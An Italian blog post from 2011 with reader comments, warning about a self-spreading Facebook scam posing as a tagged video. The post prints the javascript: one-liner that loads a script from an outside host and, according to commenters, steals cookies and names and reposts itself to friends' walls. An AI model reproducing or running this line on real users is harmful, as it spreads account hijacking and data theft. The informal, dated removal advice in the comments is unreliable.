FACEBOOK: IL PRIMO VERO VIRUS E’ TUTTO ITALIANO !

STA SERA HO PRESO IL PRIMO VIRUS SU FACEBOOK CLICCANDO SU UNA SPECIE DI VIDEO, CHE PERO’ NON ERA UN VIDEO MA UN COLLEGAMENTO JAVA A PIRATE STREAMING E A UNA SERIE DI ALTRE OPERAZIONI SEMPRE IN JAVA CHE ANDAVANO A COPIARE MESSAGGI DIVERSI SULLE BACHECHE DEGLI AMICI CON FRASI TIPO: “Ciao mattia Guarda sei stato taggato in questo video?”.
QUESTA E’ LA COSA PIU ELABORATA MAI VISTA.
QUINDI IN VESTE DI ONORATISSIMO BIOSS DECRETO CHE GLI ITALIANI SONO STATI I PRIMI A FARE IL PRIMO VERO CAVALLO DI TROIA A FACEBOOK 🙂 .

A VOI LETTORI MI RACCOMANDO OCCHIO LA NOTIFICA VI ARRIVA DA AMICI.. SEMBRA IN TUTTO E PER TUTTO UN ERRORE DI FACE E YOUTUBE.
IO CI SONO CASCATO MANNAGGIA, MI RACCOMANDO CAMBIATE LE PASSWORD DI ACCESSO…
PER INFO:
QUESTA LA RIGA DI CODICE HACKER:
Javascript:(a=(b=document).createElement(‘script’)).src=’http://www.cowboysaliensstreaming.com/tag/fb.php’,b.body.appendChild(a);void(0)

~ di ilbioss su settembre 17, 2011.

30 Risposte to “FACEBOOK: IL PRIMO VERO VIRUS E’ TUTTO ITALIANO !”

  1. PS: ,ETTE PURE IL VOSTRO NOME E CAMBIA LE FRASI… E’ IMPRESSIONANTE !!!!!!!!

    • lei sa come eliminarlo dal mio pc senza che lasci traccia e che non abbia fatto danni? la prego mi aiuti mi ha fregato anche me

  2. io non capito cosa fà

  3. nn aprite questo video e un virus

  4. ma basta cambiare la password??

  5. il virus crea copie di se stesso inviandosi automaticamente nelle bacheche dei vostri amici e nella vostra bacheca. Come se lo aveste postato voi a loro, cambia immagine e frase, rilevando il nome di ogni persona. L’unico rimedio è eliminarlo uno alla volta entrando dalle notifiche del vostro profilo in ogni bacheca dei vostri amici e cliccando sulla x in alto a dx fare rimuovi post. poi consiglio da amico è quello di cambiare password di accesso. Abbiamo notato che sembra non funzionare su Google Chrome.

  6. […] […]

  7. ci sono cascato come un pirla…non leggendo gli stati di alcuni amici che avvisavano del virus…ci sono conseguenze per il computer?conviene formattare x sicurezza?

  8. l’ho ricevuto anch’io! grazie per aver messo questa info, ho mndato il link a tutti i miei amici! Speriamo bene, io ho cambiato la mia password, consigliate altro?

  9. ma esattamente questo visrus cosa fa? intendo di danni??

  10. […] Fonte Share this:TwitterFacebookLike this:LikeBe the first to like this post. […]

  11. raga il mio non si rimuove come faccio

  12. ho cambiato lla pass ma il video dalla mia bacheca non va via come faccioooo

  13. A me non è apparso nessun messaggio, ma io ho google chrome…

  14. io ho aperto il video e il virus ha inviato il video agli altri .. potete spiegarmi bene BENE BENE cosa succede e come posso evitarlo ?
    e se sn su google chrome e cambio la password non funziona ? vi prego rispondete !!!

  15. Non è Un VIRUS!! e solo un codice javascript che fa condividere il video a i vostri amici quindi tranquilli

  16. è solo un bimbominkia lamer, non è un vero hacker, se lo fosse vi avrebbe già fottuto tutto, è solo un codice java che vi frega i cookie, e quindi tutte le password. Un hacker avrebbe fatto di peggio credetemi

  17. attenzioneee
    anche io sono una vittima
    c’è un antidoto?
    *************************************************************************************************************

  18. bene……..sono ufficialmente un’altra vittima ……………..ma quidi ora che se fa?

  19. …non avete proprio un cazzo di meglio da fare.

  20. Cari lettori non preoccupatevi, per il messaggio in bacheca basta autosegnalarselo come spam ovviamente dopo aver premuto sulla x in alto a dx vicino al filmato. dopo un po di analisi abbiamo scomposto parte del codice java e abbiamo scoperto che prende mail e nome/ cognome dello sventurato, inoltre dopo aver fatto una scansione con spybot search e destroy abbiamo rilevato cookies infetti.
    quindi se ci siete cascati:

    – rimuovete dalle bachece dei vostri amici il video come spiegato sopra e nella vostra bacheca segnalatelo come spam
    – cambiate la password di facebook
    – scaricate spybot search e destroy e avviate una scansione poi andate su immunizza.
    lo potete scaricare dal sito di html.it gratuitamente:
    http://download.html.it/software/vedi/5449/spybot-search-and-destroy/

    se avete altri problemi, scrivete e cercheremo di aiutarci tutti assieme. oltre 2000 persone visitano questo sito ogni giorno – siamo top site di wordpress.com, insomma… aiutiamoci 🙂

  21. io ho google chrome ho fatto scansione ma nn mi dà nnt quindi sn al sicuro?

  22. il link di “spybot search e destroy” riporta :

    Compatibilità Windows 9X-Me-2000-Xp-Vista

    quindi non va bene per Windows 7 ????

    ci sono alternative ????

  23. Come non detto …
    ho trovato la versione compatibile con W 7 !
    Ora provo e vediamo un pò …

  24. java, acrobat reader, office, explorer,.. di solito i maggiori untori sono loro 😀

    tolti questi i maggiori pericoli scompaiono..

  25. a me non lo metteva in bakeka, ma lo ha inviato automaticamente per chat a non so quanti amici..cm faccio ad eliminarlo da facebook?

  26. Peccato che a quella stronza decerebrata di Greta non capita mai… a quella va sempre tutto liscio. >_<#

  27. My partner and I stumbled over here different
    web address and thought I might as well
    check things out. I like what I see so now i am following you.
    Look forward to exploring your web page again.

  28. Thanks to my father who told me regarding this webpage,
    this webpage is genuinely remarkable.

  29. magnificent issues altogether, you just gained a new reader.
    What might you recommend in regards to your put up that you simply made some days ago?
    Any sure?

Rispondi

 
